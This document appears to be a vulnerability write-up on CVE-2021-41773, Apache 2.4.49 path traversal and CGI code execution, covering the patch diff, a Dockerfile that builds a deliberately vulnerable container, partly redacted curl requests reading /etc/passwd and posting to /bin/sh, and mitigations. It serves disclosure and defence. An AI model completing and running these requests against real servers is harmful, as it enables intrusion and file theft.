Overview

Apache 2.4.49 has path traversal vulnerability.

In addition, if mod-cgi is enabled, arbitrary code execution is also possible

Scope of impact

Only 2.4.49 versions are affected.

The following settings in httpd.conf will be affected

<Directory />
    Require all granted
</Directory>

or

<Directory />
    #Require all denied
</Directory>

Patch

The changed code can be seen by reading this commit

Particular attention should be paid to this section

@@ -568,8 +569,17 @@ AP_DECLARE(int) ap_normalize_path(char *path, unsigned int flags)
                     continue;
                 }

-                /* Remove /xx/../ segments */
-                if (path[l + 1] == '.' && IS_SLASH_OR_NUL(path[l + 2])) {
+                /* Remove /xx/../ segments (or /xx/.%2e/ when
+                 * AP_NORMALIZE_DECODE_UNRESERVED is set since we
+                 * decoded only the first dot above).
+                 */
+                n = l + 1;
+                if ((path[n] == '.' || (decode_unreserved
+                                        && path[n] == '%'
+                                        && path[++n] == '2'
+                                        && (path[++n] == 'e'
+                                            || path[n] == 'E')))
+                        && IS_SLASH_OR_NUL(path[n + 1])) {
                     /* Wind w back to remove the previous segment */
                     if (w > 1) {
                         do {

Proof

The sed line rewrites the configuration to vulnerable.

By default, <Directory /> is set in lines 248~251

FROM httpd:2.4.49

RUN sed -i '249,250d' /usr/local/apache2/conf/httpd.conf

build and run the vulnerable container…

$ docker image build -t cve-2021-41773 .
Sending build context to Docker daemon  26.62kB
Step 1/2 : FROM httpd:2.4.49
 ---> e91425f38618
Step 2/2 : RUN sed -i '249,250d' /usr/local/apache2/conf/httpd.conf
 ---> Running in f7f9a08201db
Removing intermediate container f7f9a08201db
 ---> d0b816039eb3
Successfully built d0b816039eb3
Successfully tagged cve-2021-41773:latest
$ docker run -t --rm -d -p 80:80 cve-2021-41773
84e7ce37c553736de7210c28e6fb5219ed72e05b8f63343df11a0fb7cfff7929
$ docker ps
CONTAINER ID   IMAGE            COMMAND              CREATED         STATUS         PORTS                NAMES
84e7ce37c553   cve-2021-41773   "httpd-foreground"   4 seconds ago   Up 3 seconds   0.0.0.0:80->80/tcp   zen_mendel

Sends a request such that path traversal occurs. The exact request is hidden here.

$ curl "http://localhost:80/**redacted**/etc/passwd"
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin

Oops, I saw something I shouldn’t have seen…

RCE

With mod-cgi enabled, arbitrary code execution is also possible

$ curl --data "*******************" http://localhost:80/******************************************/bin/sh
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
misconfiguration and was unable to complete
your request.</p>
<p>Please contact the server administrator at
 you@example.com to inform them of the time this error occurred,
 and the actions you performed just before this error.</p>
<p>More information about this error may be available
in the server error log.</p>
</body></html>
$ docker exec -t amazing_hawking cat /tmp/id
uid=1(daemon) gid=1(daemon) groups=1(daemon)

;)

Mitigation

Of course, you should upgrade the version, but you may be able to mitigate the problem by changing the settings (not guaranteed).

<Directory />
    Require all denied
</Directory>

Furthermore, mod-cgi should not be enabled in this version.